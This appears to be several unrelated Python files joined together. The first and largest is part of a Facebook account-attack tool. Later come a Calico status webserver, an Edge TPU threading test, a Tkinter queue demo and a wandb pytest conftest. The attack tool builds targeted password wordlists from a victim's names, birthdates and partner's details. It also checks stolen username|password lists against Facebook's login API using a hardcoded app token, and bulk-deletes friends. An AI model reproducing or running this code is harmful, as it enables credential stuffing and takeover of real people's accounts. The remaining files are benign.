except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print "\033[1;97mStop \033[1;91mCTRL+C"
print 42*"\033[1;97m═"
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete("https://graph.facebook.com/me/friends?uid="+id+"&access_token="+toket)
print "\033[1;97m[\033[1;92m Deleted \033[1;97m] "+nama
except IndexError: pass
except KeyboardInterrupt:
print "\033[1;91m[!] Stopped"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
print"\n\033[1;91m[+] \033[1;92mDone"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
#### LAIN LAIN #####
# #
####MENU LAIN#####
def lain():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Create Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Create Wordlist"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Account Checker"
print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m See my group list"
print "\033[1;97m║--\033[1;91m> \033[1;92m5.\033[1;97m Profile Guard"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
pilih_lain()
#////////////
def pilih_lain():
other = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if other =="":
print "\033[1;91m[!] Wrong input"
pilih_lain()
elif other =="1":
status()
elif other =="2":
wordlist()
elif other =="3":
check_akun()
elif other =="4":
grupsaya()
elif other =="5":
guard()
elif other =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
pilih_lain()
##### STATUS #####
def status():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
msg=raw_input('\033[1;91m[+] \033[1;92mType status \033[1;91m:\033[1;97m ')
if msg == "":
print "\033[1;91m[!] Don't be empty"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
else:
res = requests.get("https://graph.facebook.com/me/feed?method=POST&message="+msg+"&access_token="+toket)
op = json.loads(res.text)
jalan('\033[1;91m[✺] \033[1;92mCreate \033[1;97m...')
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mStatus ID\033[1;91m : \033[1;97m"+op['id']
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
########### CREATE WORDLIST ##########
def wordlist():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.system('reset')
print logo
print "\033[1;91m[?] \033[1;92mFill in the complete data of the target below"
print 42*"\033[1;97m═"
a = raw_input("\033[1;91m[+] \033[1;92mNama Depan \033[1;97m: ")
file = open(a+".txt", 'w')
b=raw_input("\033[1;91m[+] \033[1;92mNama Tengah \033[1;97m: ")
c=raw_input("\033[1;91m[+] \033[1;92mNama Belakang \033[1;97m: ")
d=raw_input("\033[1;91m[+] \033[1;92mNama Panggilan \033[1;97m: ")
e=raw_input("\033[1;91m[+] \033[1;92mTanggal Lahir >\033[1;96mex: |DDMMYY| \033[1;97m: ")
f=e[0:2]
g=e[2:4]
h=e[4:]
print 42*"\033[1;97m═"
print("\033[1;91m[?] \033[1;93mKalo Jomblo SKIP aja :v")
i=raw_input("\033[1;91m[+] \033[1;92mNama Pacar \033[1;97m: ")
j=raw_input("\033[1;91m[+] \033[1;92mNama Panggilan Pacar \033[1;97m: ")
k=raw_input("\033[1;91m[+] \033[1;92mTanggal Lahir Pacar >\033[1;96mex: |DDMMYY| \033[1;97m: ")
jalan('\033[1;91m[✺] \033[1;92mCreate \033[1;97m...')
l=k[0:2]
m=k[2:4]
n=k[4:]
file.write("%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s" % (a,c,a,b,b,a,b,c,c,a,c,b,a,a,b,b,c,c,a,d,b,d,c,d,d,d,d,a,d,b,d,c,a,e,a,f,a,g,a,h,b,e,b,f,b,g,b,h,c,e,c,f,c,g,c,h,d,e,d,f,d,g,d,h,e,a,f,a,g,a,h,a,e,b,f,b,g,b,h,b,e,c,f,c,g,c,h,c,e,d,f,d,g,d,h,d,d,d,a,f,g,a,g,h,f,g,f,h,f,f,g,f,g,h,g,g,h,f,h,g,h,h,h,g,f,a,g,h,b,f,g,b,g,h,c,f,g,c,g,h,d,f,g,d,g,h,a,i,a,j,a,k,i,e,i,j,i,k,b,i,b,j,b,k,c,i,c,j,c,k,e,k,j,a,j,b,j,c,j,d,j,j,k,a,k,b,k,c,k,d,k,k,i,l,i,m,i,n,j,l,j,m,j,n,j,k))
wg = 0
while (wg < 100):
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while (en < 100):
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while (word < 100):
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while (gen < 100):
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print 42*"\033[1;97m═"
print ("\033[1;91m[+] \033[1;92mSaved \033[1;91m: \033[1;97m %s.txt" %a)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except IOError, e:
print("\033[1;91m[!] Failed")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
##### CHECKER #####
def check_akun():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;91m[?] \033[1;92mCreate in file\033[1;91m : \033[1;97musername|password"
print 42*"\033[1;97m═"
live = []
cek = []
die = []
try:
file = raw_input("\033[1;91m[+] \033[1;92mFile path \033[1;91m:\033[1;97m ")
list = open(file,'r').readlines()
except IOError:
print ("\033[1;91m[!] File not found")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
pemisah = raw_input("\033[1;91m[+] \033[1;92mSeparator \033[1;91m:\033[1;97m ")
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for meki in list:
username, password = (meki.strip()).split(str(pemisah))
url = "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(username)+"&locale=en_US&password="+(password)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print"\033[1;97m[ \033[1;92mLive\033[1;97m ] \033[1;97m"+username+"|"+password
elif 'www.facebook.com' in mpsh["error_msg"]:
cek.append(password)
print"\033[1;97m[ \033[1;93mCheck\033[1;97m ] \033[1;97m"+username+"|"+password
else:
die.append(password)
print"\033[1;97m[ \033[1;91mDie\033[1;97m ] \033[1;97m"+username+"|"+password
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mTotal\033[1;91m : \033[1;97mLive=\033[1;92m"+str(len(live))+" \033[1;97mCheck=\033[1;93m"+str(len(cek))+" \033[1;97mDie=\033[1;91m"+str(len(die))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
##### GRUP SAYA #####
def grupsaya():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token='+toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p["name"]
id = p["id"]
f=open('out/Grupid.txt','w')
listgrup.append(id)
f.write(id + '\n')
print "\033[1;97m[ \033[1;92mMyGroup\033[1;97m ] "+str(id)+" => "+str(nama)
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mTotal Group \033[1;91m:\033[1;97m %s"%(len(listgrup))
print("\033[1;91m[+] \033[1;92mSaved \033[1;91m: \033[1;97mout/Grupid.txt")
f.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except KeyError:
os.remove('out/Grupid.txt')
print('\033[1;91m[!] Group not found')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No Connection"
keluar()
except IOError:
print "\033[1;91m[!] Error"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
##### PROFIL GUARD #####
def guard():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Activate"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Not activate"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
g = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if g == "1":
aktif = "true"
gaz(toket, aktif)
elif g == "2":
non = "false"
gaz(toket, non)
elif g =="0":
lain()
elif g =="":
keluar()
else:
keluar()
def get_userid(toket):
url = "https://graph.facebook.com/me?access_token=%s"%toket
res = requests.get(url)
uid = json.loads(res.text)
return uid["id"]
def gaz(toket, enable = True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {"Content-Type" : "application/x-www-form-urlencoded", "Authorization" : "OAuth %s" % toket}
url = "https://graph.facebook.com/graphql"
res = requests.post(url, data = data, headers = headers)
print(res.text)
if '"is_shielded":true' in res.text:
os.system('reset')
print logo
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mActivate"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
elif '"is_shielded":false' in res.text:
os.system('reset')
print logo
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;91mNot activate"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
else:
print "\033[1;91m[!] Error"
keluar()
lisensi()
|
webserver.py | #!/usr/bin/env python
# Copyright 2015 Metaswitch Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import threading
from flask import Flask
from config import config
from zookeeper import ZkDatastore
# Instantiate the Flask app and a ZkDatastore: we use our own datastore
# from the framework since we are running in a different thread.
app = Flask(__name__, static_url_path='')
zk = ZkDatastore()
def launch_webserver():
"""
Launch the webserver. Return a Thread object. Caller may join the Thread
if they need to be aware of its termination.
:return:
"""
kwargs = {
"host": config.webserver_bind_ip,
"port": config.webserver_bind_port
}
t = threading.Thread(target=app.run, kwargs=kwargs)
t.daemon = True
t.start()
return t
@app.route("/")
def html_server():
"""
Provide access to Calico status page.
"""
return app.send_static_file("calico-status.html")
@app.route('/json')
def agent_json():
"""
Get dictionary of agents with status for each task.
"""
return json.dumps(zk.load_agents_raw_data())
@app.route("/health")
def check_health():
"""
Provide access to Calico status page.
"""
return '{"health": "OK"}'
|
multiple_tpus_test.py | # Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import unittest
from . import test_utils
from edgetpu.basic import edgetpu_utils
from edgetpu.classification.engine import BasicEngine
from edgetpu.classification.engine import ClassificationEngine
from edgetpu.detection.engine import DetectionEngine
import numpy as np
class MultipleTpusTest(unittest.TestCase):
def test_create_basic_engine_with_specific_path(self):
edge_tpus = edgetpu_utils.ListEdgeTpuPaths(
edgetpu_utils.EDGE_TPU_STATE_UNASSIGNED)
self.assertGreater(len(edge_tpus), 0)
model_path = test_utils.test_data_path(
'mobilenet_v1_1.0_224_quant_edgetpu.tflite')
basic_engine = BasicEngine(model_path, edge_tpus[0])
self.assertEqual(edge_tpus[0], basic_engine.device_path())
def test_run_classification_and_detection_engine(self):
def classification_task(num_inferences):
tid = threading.get_ident()
print('Thread: %d, %d inferences for classification task' %
(tid, num_inferences))
labels = test_utils.read_label_file(
test_utils.test_data_path('imagenet_labels.txt'))
model_name = 'mobilenet_v1_1.0_224_quant_edgetpu.tflite'
engine = ClassificationEngine(test_utils.test_data_path(model_name))
print('Thread: %d, using device %s' % (tid, engine.device_path()))
with test_utils.test_image('cat.bmp') as img:
for _ in range(num_inferences):
ret = engine.classify_with_image(img, top_k=1)
self.assertEqual(len(ret), 1)
self.assertEqual(labels[ret[0][0]], 'Egyptian cat')
print('Thread: %d, done classification task' % tid)
def detection_task(num_inferences):
tid = threading.get_ident()
print('Thread: %d, %d inferences for detection task' %
(tid, num_inferences))
model_name = 'ssd_mobilenet_v1_coco_quant_postprocess_edgetpu.tflite'
engine = DetectionEngine(test_utils.test_data_path(model_name))
print('Thread: %d, using device %s' % (tid, engine.device_path()))
with test_utils.test_image('cat.bmp') as img:
for _ in range(num_inferences):
ret = engine.detect_with_image(img, top_k=1)
self.assertEqual(len(ret), 1)
self.assertEqual(ret[0].label_id, 16) # cat
self.assertGreater(ret[0].score, 0.7)
self.assertGreater(
test_utils.iou(
np.array([[0.1, 0.1], [0.7, 1.0]]), ret[0].bounding_box),
0.88)
print('Thread: %d, done detection task' % tid)
num_inferences = 2000
t1 = threading.Thread(target=classification_task, args=(num_inferences,))
t2 = threading.Thread(target=detection_task, args=(num_inferences,))
t1.start()
t2.start()
t1.join()
t2.join()
if __name__ == '__main__':
unittest.main()
|
gui_thread.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: mcxiaoke
# @Date: 2015-08-11 12:00:11
from __future__ import print_function
import thread
import threading
import time
import Queue as queue
dataQueue = queue.Queue()
def producer(id):
for i in range(5):
print('put')
time.sleep(0.1)
dataQueue.put('[producer id=%d, count=%d]' % (id, i))
def consumer(root):
try:
# print('get')
data = dataQueue.get(block=False)
except queue.Empty:
pass
else:
root.insert('end', 'consumer got => %s\n' % str(data))
root.see('end')
root.after(500, lambda: consumer(root))
def makethreads():
print('make threads')
for i in range(4):
thread.start_new_thread(producer, (i,))
from Tkinter import Tk, Button
from lib import ScrolledText
# 线程与界面更新
def _test_queue():
root = Tk()
Button(root, text='Make Threads', command=makethreads).pack()
st = ScrolledText(root)
st.pack()
consumer(st)
root.mainloop()
class ThreadGui(ScrolledText):
threadPerClick = 4
def __init__(self, parent=None):
ScrolledText.__init__(self, parent)
self.pack()
self.dataQueue = queue.Queue()
self.bind('<Button-1>', self.makethreads)
self.consumer()
def producer(self, id):
for i in range(10):
time.sleep(0.5)
self.dataQueue.put('[producer id=%d, count=%d]' % (id, i))
def consumer(self):
try:
data = self.dataQueue.get(block=False)
print('new data: %s' % data)
except queue.Empty:
pass
else:
self.insert('end', 'consumer got => %s\n' % str(data))
self.see('end')
self.after(100, self.consumer)
def makethreads(self, event):
for i in range(self.threadPerClick):
threading.Thread(target=self.producer, args=(i,)).start()
if __name__ == '__main__':
#_test_queue()
ThreadGui().mainloop()
|
conftest.py | import requests_mock
import os
from click.testing import CliRunner
import pytest
from wandb.history import History
from tests.api_mocks import *
import wandb
from wandb import wandb_run
from wandb.apis import InternalApi
import six
import json
import sys
import threading
import logging
from multiprocessing import Process
from vcr.request import Request
from wandb import wandb_socket
from wandb import env
from wandb import util
from wandb.wandb_run import Run
from tests import utils
from tests.mock_server import create_app
def pytest_runtest_setup(item):
# This is used to find tests that are leaking outside of tmp directories
os.environ["WANDB_DESCRIPTION"] = item.parent.name + "#" + item.name
def request_repr(self):
try:
body = json.loads(self.body)
query = body.get("query") or "no_query"
render = query.split("(")[0].split("\n")[0] + " - vars: " + str(body.get("variables", {}).get("files", {}))
except (ValueError, TypeError):
render = "BINARY"
return "({}) {} - {}".format(self.method, self.uri, render)
Request.__repr__ = request_repr
# To enable VCR logging uncomment below
#logging.basicConfig() # you need to initialize logging, otherwise you will not see anything from vcrpy
#vcr_log = logging.getLogger("vcr")
#vcr_log.setLevel(logging.INFO)
@pytest.fixture(scope='module')
def vcr_config():
def replace_body(request):
if "storage.googleapis.com" in request.uri:
request.body = "BINARY DATA"
elif "/file_stream" in request.uri:
request.body = json.dumps({"files": list(json.loads(request.body).get("files", {}.keys()))})
return request
def replace_response_body(response, *args):
"""Remove gzip response from pypi"""
if response["headers"].get("Access-Control-Expose-Headers") == ['X-PyPI-Last-Serial']:
if response["headers"].get("Content-Encoding"):
del response["headers"]["Content-Encoding"]
response["body"]["string"] = '{"info":{"version": "%s"}' % wandb.__version__
return response
return {
# Replace the Authorization request header with "DUMMY" in cassettes
"filter_headers": [('authorization', 'DUMMY')],
"match_on": ['method', 'uri', 'query', 'graphql'],
"before_record": replace_body,
"before_record_response": replace_response_body,
}
@pytest.fixture(scope='module')
def vcr(vcr):
def vcr_graphql_matcher(r1, r2):
if "/graphql" in r1.uri and "/graphql" in r2.uri:
body1 = json.loads(r1.body.decode("utf-8"))
body2 = json.loads(r2.body.decode("utf-8"))
return body1["query"].strip() == body2["query"].strip()
elif "/file_stream" in r1.uri and "/file_stream" in r2.uri:
body1 = json.loads(r1.body.decode("utf-8"))
body2 = json.loads(r2.body.decode("utf-8"))
return body1["files"] == body2["files"]
vcr.register_matcher('graphql', vcr_graphql_matcher)
return vcr
@pytest.fixture
def local_netrc(monkeypatch):
with CliRunner().isolated_filesystem():
# TODO: this seems overkill...
origexpand = os.path.expanduser
def expand(path):
return os.path.realpath("netrc") if "netrc" in path else origexpand(path)
monkeypatch.setattr(os.path, "expanduser", expand)
yield
@pytest.fixture
def history():
with CliRunner().isolated_filesystem():
yield Run().history
@pytest.fixture
def wandb_init_run(request, tmpdir, request_mocker, upsert_run, query_run_resume_status,
upload_logs, monkeypatch, mocker, capsys, local_netrc):
"""Fixture that calls wandb.init(), yields a run (or an exception) that
gets created, then cleans up afterward. This is meant to test the logic
in wandb.init, it should generally not spawn a run_manager. If you need
to test run_manager logic use that fixture.
"""
# save the environment so we can restore it later. pytest
# may actually do this itself. didn't check.
orig_environ = dict(os.environ)
orig_namespace = None
run = None
try:
with CliRunner().isolated_filesystem():
upsert_run(request_mocker)
if request.node.get_closest_marker('jupyter'):
query_run_resume_status(request_mocker)
def fake_ipython():
class Jupyter(object):
__module__ = "jupyter"
def __init__(self):
class Hook(object):
def register(self, what, where):
pass
self.events = Hook()
def register_magics(self, magic):
pass
return Jupyter()
wandb.get_ipython = fake_ipython
# no i/o wrapping - it breaks pytest
os.environ['WANDB_MODE'] = 'clirun'
if request.node.get_closest_marker('headless'):
mocker.patch('subprocess.Popen')
else:
def mock_headless(run, cloud=True):
print("_init_headless called with cloud=%s" % cloud)
mocker.patch('wandb._init_headless', mock_headless)
if not request.node.get_closest_marker('unconfigured'):
os.environ['WANDB_API_KEY'] = 'test'
os.environ['WANDB_ENTITY'] = 'test'
os.environ['WANDB_PROJECT'] = 'unit-test-project'
else:
# when unconfigured we enable run mode to test missing creds
os.environ['WANDB_MODE'] = 'run'
monkeypatch.setattr('wandb.apis.InternalApi.api_key', None)
monkeypatch.setattr(
'getpass.getpass', lambda x: "0123456789012345678901234567890123456789")
assert InternalApi().api_key == None
os.environ['WANDB_RUN_DIR'] = str(tmpdir)
if request.node.get_closest_marker('silent'):
os.environ['WANDB_SILENT'] = "true"
assert wandb.run is None
orig_namespace = vars(wandb)
# Mock out run_manager, we add it to run to access state in tests
orig_rm = wandb.run_manager.RunManager
mock = mocker.patch('wandb.run_manager.RunManager')
def fake_init(run, port=None, output=None, cloud=True):
print("Initialized fake run manager")
rm = fake_run_manager(mocker, run, cloud=cloud, rm_class=orig_rm)
rm._block_file_observer()
run.run_manager = rm
return rm
mock.side_effect = fake_init
if request.node.get_closest_marker('args'):
kwargs = request.node.get_closest_marker('args').kwargs
# Unfortunate to enable the test to work
if kwargs.get("dir"):
del os.environ['WANDB_RUN_DIR']
if kwargs.get("tensorboard"):
# The test uses tensorboardX so we need to be sure it's imported
# we use get_module because tensorboardX isn't available in py2
wandb.util.get_module("tensorboardX")
if kwargs.get("error"):
err = kwargs["error"]
del kwargs['error']
if err == "io":
@classmethod
def error(cls):
raise IOError
monkeypatch.setattr(
'wandb.wandb_run.Run.from_environment_or_defaults', error)
elif err == "socket":
class Error(object):
@property
def port(self):
return 123
def listen(self, secs):
return False, None
monkeypatch.setattr("wandb.wandb_socket.Server", Error)
if kwargs.get('k8s') is not None:
token_path = "/var/run/secrets/kubernetes.io/serviceaccount/token"
crt_path = "/var/run/secrets/kubernetes.io/serviceaccount/ca.crt"
orig_exist = os.path.exists
def exists(path):
return True if path in token_path else orig_exist(path)
def magic(path, *args, **kwargs):
if path == token_path:
return six.StringIO('token')
mocker.patch('wandb.util.open', magic, create=True)
mocker.patch('wandb.util.os.path.exists', exists)
os.environ["KUBERNETES_SERVICE_HOST"] = "k8s"
os.environ["KUBERNETES_PORT_443_TCP_PORT"] = "123"
os.environ["HOSTNAME"] = "test"
if kwargs["k8s"]:
request_mocker.register_uri("GET", "https://k8s:123/api/v1/namespaces/default/pods/test",
content=b'{"status":{"containerStatuses":[{"imageID":"docker-pullable://test@sha256:1234"}]}}')
else:
request_mocker.register_uri("GET", "https://k8s:123/api/v1/namespaces/default/pods/test",
content=b'{}', status_code=500)
del kwargs["k8s"]
if kwargs.get('sagemaker'):
del kwargs['sagemaker']
config_path = "/opt/ml/input/config/hyperparameters.json"
resource_path = "/opt/ml/input/config/resourceconfig.json"
secrets_path = "secrets.env"
os.environ['TRAINING_JOB_NAME'] = 'sage'
os.environ['CURRENT_HOST'] = 'maker'
orig_exist = os.path.exists
def exists(path):
return True if path in (config_path, secrets_path) else orig_exist(path)
mocker.patch('wandb.os.path.exists', exists)
def magic(path, *args, **kwargs):
if path == config_path:
return six.StringIO('{"fuckin": "A"}')
elif path == resource_path:
return six.StringIO('{"hosts":["a", "b"]}')
elif path == secrets_path:
return six.StringIO('WANDB_TEST_SECRET=TRUE')
else:
return six.StringIO()
mocker.patch('wandb.open', magic, create=True)
mocker.patch('wandb.util.open', magic, create=True)
elif kwargs.get("tf_config"):
os.environ['TF_CONFIG'] = json.dumps(kwargs['tf_config'])
del kwargs['tf_config']
elif kwargs.get("env"):
for k, v in six.iteritems(kwargs["env"]):
os.environ[k] = v
del kwargs["env"]
else:
kwargs = {}
if request.node.get_closest_marker('resume'):
# env was leaking when running the whole suite...
if os.getenv(env.RUN_ID):
del os.environ[env.RUN_ID]
query_run_resume_status(request_mocker)
os.mkdir(wandb.wandb_dir())
with open(os.path.join(wandb.wandb_dir(), wandb_run.RESUME_FNAME), "w") as f:
f.write(json.dumps({"run_id": "test"}))
try:
print("Initializing with", kwargs)
run = wandb.init(**kwargs)
if request.node.get_closest_marker('resume') or request.node.get_closest_marker('mocked_run_manager'):
# Reset history
run._history = None
rm = wandb.run_manager.RunManager(run)
rm.init_run(os.environ)
if request.node.get_closest_marker('mock_socket'):
run.socket = mocker.MagicMock()
assert run is wandb.run
assert run.config is wandb.config
except wandb.LaunchError as e:
print("!!! wandb LaunchError raised")
run = e
yield run
if hasattr(run, "run_manager"):
print("Shutting down run manager")
run.run_manager.test_shutdown()
finally:
# restore the original environment
os.environ.clear()
os.environ.update(orig_environ)
wandb.uninit()
wandb.get_ipython = lambda: None
assert vars(wandb) == orig_namespace
def fake_run_manager(mocker, run=None, cloud=True, rm_class=wandb.run_manager.RunManager):
# NOTE: This will create a run directory so make sure it's called in an isolated file system
# We have an optional rm_class object because we mock it above so we need it before it's mocked
api = InternalApi(load_settings=False)
api.set_setting('project', 'testing')
if wandb.run is None:
wandb.run = run or Run()
wandb.config = wandb.run.config
wandb.run._api = api
wandb.run._mkdir()
wandb.run.socket = wandb_socket.Server()
api.set_current_run_id(wandb.run.id)
mocker.patch('wandb.apis.internal.FileStreamApi')
api._file_stream_api = mocker.MagicMock()
run_manager = rm_class(wandb.run, cloud=cloud, port=wandb.run.socket.port)
class FakeProc(object):
def poll(self):
return None
def exit(self, code=0):
return None
run_manager.proc = FakeProc()
run_manager._meta = mocker.MagicMock()
run_manager._stdout_tee = mocker.MagicMock()
run_manager._stderr_tee = mocker.MagicMock()
run_manager._output_log = mocker.MagicMock()
run_manager._stdout_stream = mocker.MagicMock()
run_manager._stderr_stream = mocker.MagicMock()
run_manager.mirror_stdout_stderr = mocker.MagicMock()
run_manager.unmirror_stdout_stderr = mocker.MagicMock()
socket_thread = threading.Thread(
target=wandb.run.socket.listen)
socket_thread.start()
run_manager._socket.ready()
thread = threading.Thread(
target=run_manager._sync_etc)
thread.daemon = True
thread.start()
def test_shutdown():
if wandb.run and wandb.run.socket:
wandb.run.socket.done()
# TODO: is this needed?
socket_thread.join()
thread.join()
run_manager.test_shutdown = test_shutdown
run_manager._unblock_file_observer()
run_manager._file_pusher._push_function = mocker.MagicMock()
return run_manager
@pytest.fixture
def run_manager(mocker, request_mocker, upsert_run, query_viewer):
"""This fixture emulates the run_manager headless mode in a single process
Just call run_manager.test_shutdown() to join the threads
"""
with CliRunner().isolated_filesystem():
query_viewer(request_mocker)
upsert_run(request_mocker)
run_manager = fake_run_manager(mocker)
yield run_manager
wandb.uninit()
@pytest.fixture
def loggedin():
orig_environ = dict(os.environ)
try:
with CliRunner().isolated_filesystem():
os.environ["WANDB_API_KEY"] = "X"*40
yield os.environ
finally:
os.environ.clear()
os.environ.update(orig_environ)
wandb.uninit()
@pytest.fixture
def dryrun():
orig_environ = dict(os.environ)
try:
with CliRunner().isolated_filesystem():
os.environ["WANDB_MODE"] = "dryrun"
yield os.environ
finally:
os.environ.clear()
os.environ.update(orig_environ)
wandb.uninit()
# "Error: 'Session' object has no attribute 'request'""
# @pytest.fixture(autouse=True)
# def no_requests(monkeypatch):
# monkeypatch.delattr("requests.sessions.Session.request")
@pytest.fixture
def request_mocker(request):
"""
:param request: pytest request object for cleaning up.
:return: Returns instance of requests mocker used to mock HTTP calls.
"""
m = requests_mock.Mocker()
m.start()
request.addfinalizer(m.stop)
return m
@pytest.fixture(autouse=True)
def preserve_environ():
environ = dict(os.environ)
try:
yield
finally:
os.environ.clear()
os.environ.update(environ)
@pytest.fixture(autouse=True)
def check_environ():
"""Warn about WANDB_ environment variables the user has set
Sometimes it's useful to set things like WANDB_DEBUG intentionally, or
set other things for hacky debugging, but we want to make sure the user
knows about it.
"""
# we ignore WANDB_DESCRIPTION because we set it intentionally in
# pytest_runtest_setup()
wandb_keys = [key for key in os.environ.keys() if key.startswith(
'WANDB_') and key not in ['WANDB_TEST', 'WANDB_DESCRIPTION']]
if wandb_keys:
wandb.termwarn('You have WANDB_ environment variable(s) set. These may interfere with tests:')
for key in wandb_keys:
wandb.termwarn(' {} = {}'.format(key, repr(os.environ[key])))
@pytest.fixture
def mock_server(mocker, request_mocker):
app = create_app()
mock = utils.RequestsMock(app.test_client(), {})
mocker.patch("gql.transport.requests.requests", mock)
mocker.patch("wandb.apis.file_stream.requests", mock)
mocker.patch("wandb.apis.internal.requests", mock)
return mock
@pytest.fixture
def live_mock_server(request):
if request.node.get_closest_marker('port'):
port = request.node.get_closest_marker('port').args[0]
else:
